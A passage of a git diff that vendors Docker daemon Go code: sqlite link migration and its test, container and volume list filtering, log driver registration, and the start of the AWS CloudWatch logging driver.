env[tcpport] == fmt.Sprintf("%d", i) { + t.Fatalf("Expected env %s = %d, got %s", tcpport, i, env[tcpport]) + } + if env[tcpproto] == "tcp" { + t.Fatalf("Expected env %s = tcp, got %s", tcpproto, env[tcpproto]) + } + if env[tcp] == fmt.Sprintf("tcp://172.0.17.2:%d", i) { + t.Fatalf("Expected env %s = tcp://172.0.17.2:%d, got %s", tcp, i, env[tcp]) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/links_linux.go b/vendor/github.com/docker/docker/daemon/links_linux.go new file mode 100644 index 0000000000..2ea40d9e51 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links_linux.go @@ -0,0 +1,72 @@ +package daemon + +import ( + "fmt" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/graphdb" +) + +// migrateLegacySqliteLinks migrates sqlite links to use links from HostConfig +// when sqlite links were used, hostConfig.Links was set to nil +func (daemon *Daemon) migrateLegacySqliteLinks(db *graphdb.Database, container *container.Container) error { + // if links is populated (or an empty slice), then this isn't using sqlite links and can be skipped + if container.HostConfig == nil || container.HostConfig.Links != nil { + return nil + } + + logrus.Debugf("migrating legacy sqlite link info for container: %s", container.ID) + + fullName := container.Name + if fullName[0] != '/' { + fullName = "/" + fullName + } + + // don't use a nil slice, this ensures that the check above will skip once the migration has completed + links := []string{} + children, err := db.Children(fullName, 0) + if err != nil { + if !strings.Contains(err.Error(), "Cannot find child for") { + return err + } + // else continue... 
it's ok if we didn't find any children, it'll just be nil and we can continue the migration + } + + for _, child := range children { + c, err := daemon.GetContainer(child.Entity.ID()) + if err != nil { + return err + } + + links = append(links, c.Name+":"+child.Edge.Name) + } + + container.HostConfig.Links = links + return container.WriteHostConfig() +} + +// sqliteMigration performs the link graph DB migration. +func (daemon *Daemon) sqliteMigration(containers map[string]*container.Container) error { + // migrate any legacy links from sqlite + linkdbFile := filepath.Join(daemon.root, "linkgraph.db") + var ( + legacyLinkDB *graphdb.Database + err error + ) + + legacyLinkDB, err = graphdb.NewSqliteConn(linkdbFile) + if err != nil { + return fmt.Errorf("error connecting to legacy link graph DB %s, container links may be lost: %v", linkdbFile, err) + } + defer legacyLinkDB.Close() + + for _, c := range containers { + if err := daemon.migrateLegacySqliteLinks(legacyLinkDB, c); err != nil { + return err + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/links_linux_test.go b/vendor/github.com/docker/docker/daemon/links_linux_test.go new file mode 100644 index 0000000000..e2dbff2d25 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links_linux_test.go @@ -0,0 +1,98 @@ +package daemon + +import ( + "encoding/json" + "io/ioutil" + "os" + "path" + "path/filepath" + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/graphdb" + "github.com/docker/docker/pkg/stringid" +) + +func TestMigrateLegacySqliteLinks(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "legacy-qlite-links-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + name1 := "test1" + c1 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: stringid.GenerateNonCryptoID(), + Name: name1, + HostConfig: &containertypes.HostConfig{}, + }, + } 
+ c1.Root = tmpDir + + name2 := "test2" + c2 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: stringid.GenerateNonCryptoID(), + Name: name2, + }, + } + + store := container.NewMemoryStore() + store.Add(c1.ID, c1) + store.Add(c2.ID, c2) + + d := &Daemon{root: tmpDir, containers: store} + db, err := graphdb.NewSqliteConn(filepath.Join(d.root, "linkgraph.db")) + if err != nil { + t.Fatal(err) + } + + if _, err := db.Set("/"+name1, c1.ID); err != nil { + t.Fatal(err) + } + + if _, err := db.Set("/"+name2, c2.ID); err != nil { + t.Fatal(err) + } + + alias := "hello" + if _, err := db.Set(path.Join(c1.Name, alias), c2.ID); err != nil { + t.Fatal(err) + } + + if err := d.migrateLegacySqliteLinks(db, c1); err != nil { + t.Fatal(err) + } + + if len(c1.HostConfig.Links) != 1 { + t.Fatal("expected links to be populated but is empty") + } + + expected := name2 + ":" + alias + actual := c1.HostConfig.Links[0] + if actual != expected { + t.Fatalf("got wrong link value, expected: %q, got: %q", expected, actual) + } + + // ensure this is persisted + b, err := ioutil.ReadFile(filepath.Join(c1.Root, "hostconfig.json")) + if err != nil { + t.Fatal(err) + } + type hc struct { + Links []string + } + var cfg hc + if err := json.Unmarshal(b, &cfg); err != nil { + t.Fatal(err) + } + + if len(cfg.Links) != 1 { + t.Fatalf("expected one entry in links, got: %d", len(cfg.Links)) + } + if cfg.Links[0] != expected { // same expected as above + t.Fatalf("got wrong link value, expected: %q, got: %q", expected, cfg.Links[0]) + } +} diff --git a/vendor/github.com/docker/docker/daemon/links_notlinux.go b/vendor/github.com/docker/docker/daemon/links_notlinux.go new file mode 100644 index 0000000000..12c226cfac --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links_notlinux.go @@ -0,0 +1,10 @@ +// +build !linux + +package daemon + +import "github.com/docker/docker/container" + +// sqliteMigration performs the link graph DB migration. 
No-op on platforms other than Linux +func (daemon *Daemon) sqliteMigration(_ map[string]*container.Container) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/list.go b/vendor/github.com/docker/docker/daemon/list.go new file mode 100644 index 0000000000..02805ea62b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/list.go @@ -0,0 +1,660 @@ +package daemon + +import ( + "errors" + "fmt" + "sort" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/volume" + "github.com/docker/go-connections/nat" +) + +var acceptedVolumeFilterTags = map[string]bool{ + "dangling": true, + "name": true, + "driver": true, + "label": true, +} + +var acceptedPsFilterTags = map[string]bool{ + "ancestor": true, + "before": true, + "exited": true, + "id": true, + "isolation": true, + "label": true, + "name": true, + "status": true, + "health": true, + "since": true, + "volume": true, + "network": true, + "is-task": true, +} + +// iterationAction represents possible outcomes happening during the container iteration. +type iterationAction int + +// containerReducer represents a reducer for a container. +// Returns the object to serialize by the api. +type containerReducer func(*container.Container, *listContext) (*types.Container, error) + +const ( + // includeContainer is the action to include a container in the reducer. + includeContainer iterationAction = iota + // excludeContainer is the action to exclude a container in the reducer. + excludeContainer + // stopIteration is the action to stop iterating over the list of containers. + stopIteration +) + +// errStopIteration makes the iterator to stop without returning an error. 
+var errStopIteration = errors.New("container list iteration stopped") + +// List returns an array of all containers registered in the daemon. +func (daemon *Daemon) List() []*container.Container { + return daemon.containers.List() +} + +// listContext is the daemon generated filtering to iterate over containers. +// This is created based on the user specification from types.ContainerListOptions. +type listContext struct { + // idx is the container iteration index for this context + idx int + // ancestorFilter tells whether it should check ancestors or not + ancestorFilter bool + // names is a list of container names to filter with + names map[string][]string + // images is a list of images to filter with + images map[image.ID]bool + // filters is a collection of arguments to filter with, specified by the user + filters filters.Args + // exitAllowed is a list of exit codes allowed to filter with + exitAllowed []int + + // beforeFilter is a filter to ignore containers that appear before the one given + beforeFilter *container.Container + // sinceFilter is a filter to stop the filtering when the iterator arrive to the given container + sinceFilter *container.Container + + // taskFilter tells if we should filter based on wether a container is part of a task + taskFilter bool + // isTask tells us if the we should filter container that are a task (true) or not (false) + isTask bool + // ContainerListOptions is the filters set by the user + *types.ContainerListOptions +} + +// byContainerCreated is a temporary type used to sort a list of containers by creation time. +type byContainerCreated []*container.Container + +func (r byContainerCreated) Len() int { return len(r) } +func (r byContainerCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byContainerCreated) Less(i, j int) bool { + return r[i].Created.UnixNano() < r[j].Created.UnixNano() +} + +// Containers returns the list of containers to show given the user's filtering. 
+func (daemon *Daemon) Containers(config *types.ContainerListOptions) ([]*types.Container, error) { + return daemon.reduceContainers(config, daemon.transformContainer) +} + +func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Container { + idSearch := false + names := ctx.filters.Get("name") + ids := ctx.filters.Get("id") + if len(names)+len(ids) == 0 { + // if name or ID filters are not in use, return to + // standard behavior of walking the entire container + // list from the daemon's in-memory store + return daemon.List() + } + + // idSearch will determine if we limit name matching to the IDs + // matched from any IDs which were specified as filters + if len(ids) > 0 { + idSearch = true + } + + matches := make(map[string]bool) + // find ID matches; errors represent "not found" and can be ignored + for _, id := range ids { + if fullID, err := daemon.idIndex.Get(id); err == nil { + matches[fullID] = true + } + } + + // look for name matches; if ID filtering was used, then limit the + // search space to the matches map only; errors represent "not found" + // and can be ignored + if len(names) > 0 { + for id, idNames := range ctx.names { + // if ID filters were used and no matches on that ID were + // found, continue to next ID in the list + if idSearch && !matches[id] { + continue + } + for _, eachName := range idNames { + if ctx.filters.Match("name", eachName) { + matches[id] = true + } + } + } + } + + cntrs := make([]*container.Container, 0, len(matches)) + for id := range matches { + if c := daemon.containers.Get(id); c != nil { + cntrs = append(cntrs, c) + } + } + + // Restore sort-order after filtering + // Created gives us nanosec resolution for sorting + sort.Sort(sort.Reverse(byContainerCreated(cntrs))) + + return cntrs +} + +// reduceContainers parses the user's filtering options and generates the list of containers to return based on a reducer. 
+func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reducer containerReducer) ([]*types.Container, error) { + var ( + containers = []*types.Container{} + ) + + ctx, err := daemon.foldFilter(config) + if err != nil { + return nil, err + } + + // fastpath to only look at a subset of containers if specific name + // or ID matches were provided by the user--otherwise we potentially + // end up locking and querying many more containers than intended + containerList := daemon.filterByNameIDMatches(ctx) + + for _, container := range containerList { + t, err := daemon.reducePsContainer(container, ctx, reducer) + if err != nil { + if err != errStopIteration { + return nil, err + } + break + } + if t != nil { + containers = append(containers, t) + ctx.idx++ + } + } + + return containers, nil +} + +// reducePsContainer is the basic representation for a container as expected by the ps command. +func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *listContext, reducer containerReducer) (*types.Container, error) { + container.Lock() + defer container.Unlock() + + // filter containers to return + action := includeContainerInList(container, ctx) + switch action { + case excludeContainer: + return nil, nil + case stopIteration: + return nil, errStopIteration + } + + // transform internal container struct into api structs + return reducer(container, ctx) +} + +// foldFilter generates the container filter based on the user's filtering options. 
+func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listContext, error) { + psFilters := config.Filters + + if err := psFilters.Validate(acceptedPsFilterTags); err != nil { + return nil, err + } + + var filtExited []int + + err := psFilters.WalkValues("exited", func(value string) error { + code, err := strconv.Atoi(value) + if err != nil { + return err + } + filtExited = append(filtExited, code) + return nil + }) + if err != nil { + return nil, err + } + + err = psFilters.WalkValues("status", func(value string) error { + if !container.IsValidStateString(value) { + return fmt.Errorf("Unrecognised filter value for status: %s", value) + } + + config.All = true + return nil + }) + if err != nil { + return nil, err + } + + var taskFilter, isTask bool + if psFilters.Include("is-task") { + if psFilters.ExactMatch("is-task", "true") { + taskFilter = true + isTask = true + } else if psFilters.ExactMatch("is-task", "false") { + taskFilter = true + isTask = false + } else { + return nil, fmt.Errorf("Invalid filter 'is-task=%s'", psFilters.Get("is-task")) + } + } + + err = psFilters.WalkValues("health", func(value string) error { + if !container.IsValidHealthString(value) { + return fmt.Errorf("Unrecognised filter value for health: %s", value) + } + + return nil + }) + if err != nil { + return nil, err + } + + var beforeContFilter, sinceContFilter *container.Container + + err = psFilters.WalkValues("before", func(value string) error { + beforeContFilter, err = daemon.GetContainer(value) + return err + }) + if err != nil { + return nil, err + } + + err = psFilters.WalkValues("since", func(value string) error { + sinceContFilter, err = daemon.GetContainer(value) + return err + }) + if err != nil { + return nil, err + } + + imagesFilter := map[image.ID]bool{} + var ancestorFilter bool + if psFilters.Include("ancestor") { + ancestorFilter = true + psFilters.WalkValues("ancestor", func(ancestor string) error { + id, err := daemon.GetImageID(ancestor) + if err != 
nil { + logrus.Warnf("Error while looking up for image %v", ancestor) + return nil + } + if imagesFilter[id] { + // Already seen this ancestor, skip it + return nil + } + // Then walk down the graph and put the imageIds in imagesFilter + populateImageFilterByParents(imagesFilter, id, daemon.imageStore.Children) + return nil + }) + } + + return &listContext{ + filters: psFilters, + ancestorFilter: ancestorFilter, + images: imagesFilter, + exitAllowed: filtExited, + beforeFilter: beforeContFilter, + sinceFilter: sinceContFilter, + taskFilter: taskFilter, + isTask: isTask, + ContainerListOptions: config, + names: daemon.nameIndex.GetAll(), + }, nil +} + +// includeContainerInList decides whether a container should be included in the output or not based in the filter. +// It also decides if the iteration should be stopped or not. +func includeContainerInList(container *container.Container, ctx *listContext) iterationAction { + // Do not include container if it's in the list before the filter container. + // Set the filter container to nil to include the rest of containers after this one. 
+ if ctx.beforeFilter != nil { + if container.ID == ctx.beforeFilter.ID { + ctx.beforeFilter = nil + } + return excludeContainer + } + + // Stop iteration when the container arrives to the filter container + if ctx.sinceFilter != nil { + if container.ID == ctx.sinceFilter.ID { + return stopIteration + } + } + + // Do not include container if it's stopped and we're not filters + if !container.Running && !ctx.All && ctx.Limit <= 0 { + return excludeContainer + } + + // Do not include container if the name doesn't match + if !ctx.filters.Match("name", container.Name) { + return excludeContainer + } + + // Do not include container if the id doesn't match + if !ctx.filters.Match("id", container.ID) { + return excludeContainer + } + + if ctx.taskFilter { + if ctx.isTask != container.Managed { + return excludeContainer + } + } + + // Do not include container if any of the labels don't match + if !ctx.filters.MatchKVList("label", container.Config.Labels) { + return excludeContainer + } + + // Do not include container if isolation doesn't match + if excludeContainer == excludeByIsolation(container, ctx) { + return excludeContainer + } + + // Stop iteration when the index is over the limit + if ctx.Limit > 0 && ctx.idx == ctx.Limit { + return stopIteration + } + + // Do not include container if its exit code is not in the filter + if len(ctx.exitAllowed) > 0 { + shouldSkip := true + for _, code := range ctx.exitAllowed { + if code == container.ExitCode() && !container.Running && !container.StartedAt.IsZero() { + shouldSkip = false + break + } + } + if shouldSkip { + return excludeContainer + } + } + + // Do not include container if its status doesn't match the filter + if !ctx.filters.Match("status", container.State.StateString()) { + return excludeContainer + } + + // Do not include container if its health doesn't match the filter + if !ctx.filters.ExactMatch("health", container.State.HealthString()) { + return excludeContainer + } + + if ctx.filters.Include("volume") { + 
volumesByName := make(map[string]*volume.MountPoint) + for _, m := range container.MountPoints { + if m.Name != "" { + volumesByName[m.Name] = m + } else { + volumesByName[m.Source] = m + } + } + + volumeExist := fmt.Errorf("volume mounted in container") + err := ctx.filters.WalkValues("volume", func(value string) error { + if _, exist := container.MountPoints[value]; exist { + return volumeExist + } + if _, exist := volumesByName[value]; exist { + return volumeExist + } + return nil + }) + if err != volumeExist { + return excludeContainer + } + } + + if ctx.ancestorFilter { + if len(ctx.images) == 0 { + return excludeContainer + } + if !ctx.images[container.ImageID] { + return excludeContainer + } + } + + networkExist := fmt.Errorf("container part of network") + if ctx.filters.Include("network") { + err := ctx.filters.WalkValues("network", func(value string) error { + if _, ok := container.NetworkSettings.Networks[value]; ok { + return networkExist + } + for _, nw := range container.NetworkSettings.Networks { + if nw.EndpointSettings == nil { + continue + } + if nw.NetworkID == value { + return networkExist + } + } + return nil + }) + if err != networkExist { + return excludeContainer + } + } + + return includeContainer +} + +// transformContainer generates the container type expected by the docker ps command. 
+func (daemon *Daemon) transformContainer(container *container.Container, ctx *listContext) (*types.Container, error) { + newC := &types.Container{ + ID: container.ID, + Names: ctx.names[container.ID], + ImageID: container.ImageID.String(), + } + if newC.Names == nil { + // Dead containers will often have no name, so make sure the response isn't null + newC.Names = []string{} + } + + image := container.Config.Image // if possible keep the original ref + if image != container.ImageID.String() { + id, err := daemon.GetImageID(image) + if _, isDNE := err.(ErrImageDoesNotExist); err != nil && !isDNE { + return nil, err + } + if err != nil || id != container.ImageID { + image = container.ImageID.String() + } + } + newC.Image = image + + if len(container.Args) > 0 { + args := []string{} + for _, arg := range container.Args { + if strings.Contains(arg, " ") { + args = append(args, fmt.Sprintf("'%s'", arg)) + } else { + args = append(args, arg) + } + } + argsAsString := strings.Join(args, " ") + + newC.Command = fmt.Sprintf("%s %s", container.Path, argsAsString) + } else { + newC.Command = container.Path + } + newC.Created = container.Created.Unix() + newC.State = container.State.StateString() + newC.Status = container.State.String() + newC.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode) + // copy networks to avoid races + networks := make(map[string]*networktypes.EndpointSettings) + for name, network := range container.NetworkSettings.Networks { + if network == nil || network.EndpointSettings == nil { + continue + } + networks[name] = &networktypes.EndpointSettings{ + EndpointID: network.EndpointID, + Gateway: network.Gateway, + IPAddress: network.IPAddress, + IPPrefixLen: network.IPPrefixLen, + IPv6Gateway: network.IPv6Gateway, + GlobalIPv6Address: network.GlobalIPv6Address, + GlobalIPv6PrefixLen: network.GlobalIPv6PrefixLen, + MacAddress: network.MacAddress, + NetworkID: network.NetworkID, + } + if network.IPAMConfig != nil { + 
networks[name].IPAMConfig = &networktypes.EndpointIPAMConfig{ + IPv4Address: network.IPAMConfig.IPv4Address, + IPv6Address: network.IPAMConfig.IPv6Address, + } + } + } + newC.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks} + + newC.Ports = []types.Port{} + for port, bindings := range container.NetworkSettings.Ports { + p, err := nat.ParsePort(port.Port()) + if err != nil { + return nil, err + } + if len(bindings) == 0 { + newC.Ports = append(newC.Ports, types.Port{ + PrivatePort: uint16(p), + Type: port.Proto(), + }) + continue + } + for _, binding := range bindings { + h, err := nat.ParsePort(binding.HostPort) + if err != nil { + return nil, err + } + newC.Ports = append(newC.Ports, types.Port{ + PrivatePort: uint16(p), + PublicPort: uint16(h), + Type: port.Proto(), + IP: binding.HostIP, + }) + } + } + + if ctx.Size { + sizeRw, sizeRootFs := daemon.getSize(container) + newC.SizeRw = sizeRw + newC.SizeRootFs = sizeRootFs + } + newC.Labels = container.Config.Labels + newC.Mounts = addMountPoints(container) + + return newC, nil +} + +// Volumes lists known volumes, using the filter to restrict the range +// of volumes returned. 
+func (daemon *Daemon) Volumes(filter string) ([]*types.Volume, []string, error) { + var ( + volumesOut []*types.Volume + ) + volFilters, err := filters.FromParam(filter) + if err != nil { + return nil, nil, err + } + + if err := volFilters.Validate(acceptedVolumeFilterTags); err != nil { + return nil, nil, err + } + + volumes, warnings, err := daemon.volumes.List() + if err != nil { + return nil, nil, err + } + + filterVolumes, err := daemon.filterVolumes(volumes, volFilters) + if err != nil { + return nil, nil, err + } + for _, v := range filterVolumes { + apiV := volumeToAPIType(v) + if vv, ok := v.(interface { + CachedPath() string + }); ok { + apiV.Mountpoint = vv.CachedPath() + } else { + apiV.Mountpoint = v.Path() + } + volumesOut = append(volumesOut, apiV) + } + return volumesOut, warnings, nil +} + +// filterVolumes filters volume list according to user specified filter +// and returns user chosen volumes +func (daemon *Daemon) filterVolumes(vols []volume.Volume, filter filters.Args) ([]volume.Volume, error) { + // if filter is empty, return original volume list + if filter.Len() == 0 { + return vols, nil + } + + var retVols []volume.Volume + for _, vol := range vols { + if filter.Include("name") { + if !filter.Match("name", vol.Name()) { + continue + } + } + if filter.Include("driver") { + if !filter.Match("driver", vol.DriverName()) { + continue + } + } + if filter.Include("label") { + v, ok := vol.(volume.DetailedVolume) + if !ok { + continue + } + if !filter.MatchKVList("label", v.Labels()) { + continue + } + } + retVols = append(retVols, vol) + } + danglingOnly := false + if filter.Include("dangling") { + if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") { + danglingOnly = true + } else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") { + return nil, fmt.Errorf("Invalid filter 'dangling=%s'", filter.Get("dangling")) + } + retVols = daemon.volumes.FilterByUsed(retVols, !danglingOnly) + } + 
return retVols, nil +} + +func populateImageFilterByParents(ancestorMap map[image.ID]bool, imageID image.ID, getChildren func(image.ID) []image.ID) { + if !ancestorMap[imageID] { + for _, id := range getChildren(imageID) { + populateImageFilterByParents(ancestorMap, id, getChildren) + } + ancestorMap[imageID] = true + } +} diff --git a/vendor/github.com/docker/docker/daemon/list_unix.go b/vendor/github.com/docker/docker/daemon/list_unix.go new file mode 100644 index 0000000000..91c9caccf4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/list_unix.go @@ -0,0 +1,11 @@ +// +build linux freebsd solaris + +package daemon + +import "github.com/docker/docker/container" + +// excludeByIsolation is a platform specific helper function to support PS +// filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix. +func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction { + return includeContainer +} diff --git a/vendor/github.com/docker/docker/daemon/list_windows.go b/vendor/github.com/docker/docker/daemon/list_windows.go new file mode 100644 index 0000000000..7fbcd3af26 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/list_windows.go @@ -0,0 +1,20 @@ +package daemon + +import ( + "strings" + + "github.com/docker/docker/container" +) + +// excludeByIsolation is a platform specific helper function to support PS +// filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix. 
+func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction { + i := strings.ToLower(string(container.HostConfig.Isolation)) + if i == "" { + i = "default" + } + if !ctx.filters.Match("isolation", i) { + return excludeContainer + } + return includeContainer +} diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go new file mode 100644 index 0000000000..ad343c1e8e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go @@ -0,0 +1,15 @@ +package daemon + +import ( + // Importing packages here only to make sure their init gets called and + // therefore they register themselves to the logdriver factory. + _ "github.com/docker/docker/daemon/logger/awslogs" + _ "github.com/docker/docker/daemon/logger/fluentd" + _ "github.com/docker/docker/daemon/logger/gcplogs" + _ "github.com/docker/docker/daemon/logger/gelf" + _ "github.com/docker/docker/daemon/logger/journald" + _ "github.com/docker/docker/daemon/logger/jsonfilelog" + _ "github.com/docker/docker/daemon/logger/logentries" + _ "github.com/docker/docker/daemon/logger/splunk" + _ "github.com/docker/docker/daemon/logger/syslog" +) diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go new file mode 100644 index 0000000000..f3002b97e2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go @@ -0,0 +1,13 @@ +package daemon + +import ( + // Importing packages here only to make sure their init gets called and + // therefore they register themselves to the logdriver factory. 
+ _ "github.com/docker/docker/daemon/logger/awslogs" + _ "github.com/docker/docker/daemon/logger/etwlogs" + _ "github.com/docker/docker/daemon/logger/fluentd" + _ "github.com/docker/docker/daemon/logger/jsonfilelog" + _ "github.com/docker/docker/daemon/logger/logentries" + _ "github.com/docker/docker/daemon/logger/splunk" + _ "github.com/docker/docker/daemon/logger/syslog" +) diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go new file mode 100644 index 0000000000..fee518db4b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go @@ -0,0 +1,404 @@ +// Package awslogs provides the logdriver for forwarding container logs to Amazon CloudWatch Logs +package awslogs + +import ( + "errors" + "fmt" + "os" + "runtime" + "sort" + "strings" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/aws/aws-sdk-go/aws" + "github.com/aws/aws-sdk-go/aws/awserr" + "github.com/aws/aws-sdk-go/aws/ec2metadata" + "github.com/aws/aws-sdk-go/aws/request" + "github.com/aws/aws-sdk-go/aws/session" + "github.com/aws/aws-sdk-go/service/cloudwatchlogs" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/dockerversion" +) + +const ( + name = "awslogs" + regionKey = "awslogs-region" + regionEnvKey = "AWS_REGION" + logGroupKey = "awslogs-group" + logStreamKey = "awslogs-stream" + tagKey = "tag" + batchPublishFrequency = 5 * time.Second + + // See: http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html + perEventBytes = 26 + maximumBytesPerPut = 1048576 + maximumLogEventsPerPut = 10000 + + // See: http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/cloudwatch_limits.html + maximumBytesPerEvent = 262144 - perEventBytes + + resourceAlreadyExistsCode = "ResourceAlreadyExistsException" + dataAlreadyAcceptedCode = 
"DataAlreadyAcceptedException" + invalidSequenceTokenCode = "InvalidSequenceTokenException" + + userAgentHeader = "User-Agent" +) + +type logStream struct { + logStreamName string + logGroupName string + client api + messages chan *logger.Message + lock sync.RWMutex + closed bool + sequenceToken *string +} + +type api interface { + CreateLogStream(*cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) + PutLogEvents(*cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error) +} + +type regionFinder interface { + Region() (string, error) +} + +type wrappedEvent struct { + inputLogEvent *cloudwatchlogs.InputLogEvent + insertOrder int +} +type byTimestamp []wrappedEvent + +// init registers the awslogs driver +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates an awslogs logger using the configuration passed in on the +// context. Supported context configuration variables are awslogs-region, +// awslogs-group, and awslogs-stream. When available, configuration is +// also taken from environment variables AWS_REGION, AWS_ACCESS_KEY_ID, +// AWS_SECRET_ACCESS_KEY, the shared credentials file (~/.aws/credentials), and +// the EC2 Instance Metadata Service. 
+func New(ctx logger.Context) (logger.Logger, error) { + logGroupName := ctx.Config[logGroupKey] + logStreamName, err := loggerutils.ParseLogTag(ctx, "{{.FullID}}") + if err != nil { + return nil, err + } + + if ctx.Config[logStreamKey] != "" { + logStreamName = ctx.Config[logStreamKey] + } + client, err := newAWSLogsClient(ctx) + if err != nil { + return nil, err + } + containerStream := &logStream{ + logStreamName: logStreamName, + logGroupName: logGroupName, + client: client, + messages: make(chan *logger.Message, 4096), + } + err = containerStream.create() + if err != nil { + return nil, err + } + go containerStream.collectBatch() + + return containerStream, nil +} + +// newRegionFinder is a variable such that the implementation +// can be swapped out for unit tests. +var newRegionFinder = func() regionFinder { + return ec2metadata.New(session.New()) +} + +// newAWSLogsClient creates the service client for Amazon CloudWatch Logs. +// Customizations to the default client from the SDK include a Docker-specific +// User-Agent string and automatic region detection using the EC2 Instance +// Metadata Service when region is otherwise unspecified. 
+func newAWSLogsClient(ctx logger.Context) (api, error) { + var region *string + if os.Getenv(regionEnvKey) != "" { + region = aws.String(os.Getenv(regionEnvKey)) + } + if ctx.Config[regionKey] != "" { + region = aws.String(ctx.Config[regionKey]) + } + if region == nil || *region == "" { + logrus.Info("Trying to get region from EC2 Metadata") + ec2MetadataClient := newRegionFinder() + r, err := ec2MetadataClient.Region() + if err != nil { + logrus.WithFields(logrus.Fields{ + "error": err, + }).Error("Could not get region from EC2 metadata, environment, or log option") + return nil, errors.New("Cannot determine region for awslogs driver") + } + region = &r + } + logrus.WithFields(logrus.Fields{ + "region": *region, + }).Debug("Created awslogs client") + + client := cloudwatchlogs.New(session.New(), aws.NewConfig().WithRegion(*region)) + + client.Handlers.Build.PushBackNamed(request.NamedHandler{ + Name: "DockerUserAgentHandler", + Fn: func(r *request.Request) { + currentAgent := r.HTTPRequest.Header.Get(userAgentHeader) + r.HTTPRequest.Header.Set(userAgentHeader, + fmt.Sprintf("Docker %s (%s) %s", + dockerversion.Version, runtime.GOOS, currentAgent)) + }, + }) + return client, nil +} + +// Name returns the name of the awslogs logging driver +func (l *logStream) Name() string { + return name +} + +// Log submits messages for logging by an instance of the awslogs logging driver +func (l *logStream) Log(msg *logger.Message) error { + l.lock.RLock() + defer l.lock.RUnlock() + if !l.closed { + // buffer up the data, making sure to copy the Line data + l.messages <- logger.CopyMessage(msg) + } + return nil +} + +// Close closes the instance of the awslogs logging driver +func (l *logStream) Close() error { + l.lock.Lock() + defer l.lock.Unlock() + if !l.closed { + close(l.messages) + } + l.closed = true + return nil +} + +// create creates a log stream for the instance of the awslogs logging driver +func (l *logStream) create() error { + input := 
&cloudwatchlogs.CreateLogStreamInput{ + LogGroupName: aws.String(l.logGroupName), + LogStreamName: aws.String(l.logStreamName), + } + + _, err := l.client.CreateLogStream(input) + + if err != nil { + if awsErr, ok := err.(awserr.Error); ok { + fields := logrus.Fields{ + "errorCode": awsErr.Code(), + "message": awsErr.Message(), + "origError": awsErr.OrigErr(), + "logGroupName": l.logGroupName, + "logStreamName": l.logStreamName, + } + if awsErr.Code() == resourceAlreadyExistsCode { + // Allow creation to succeed + logrus.WithFields(fields).Info("Log stream already exists") + return nil + } + logrus.WithFields(fields).Error("Failed to create log stream") + } + } + return err +} + +// newTicker is used for time-based batching. newTicker is a variable such +// that the implementation can be swapped out for unit tests. +var newTicker = func(freq time.Duration) *time.Ticker { + return time.NewTicker(freq) +} + +// collectBatch executes as a goroutine to perform batching of log events for +// submission to the log stream. Batching is performed on time- and size- +// bases. Time-based batching occurs at a 5 second interval (defined in the +// batchPublishFrequency const). Size-based batching is performed on the +// maximum number of events per batch (defined in maximumLogEventsPerPut) and +// the maximum number of total bytes in a batch (defined in +// maximumBytesPerPut). Log messages are split by the maximum bytes per event +// (defined in maximumBytesPerEvent). There is a fixed per-event byte overhead +// (defined in perEventBytes) which is accounted for in split- and batch- +// calculations. 
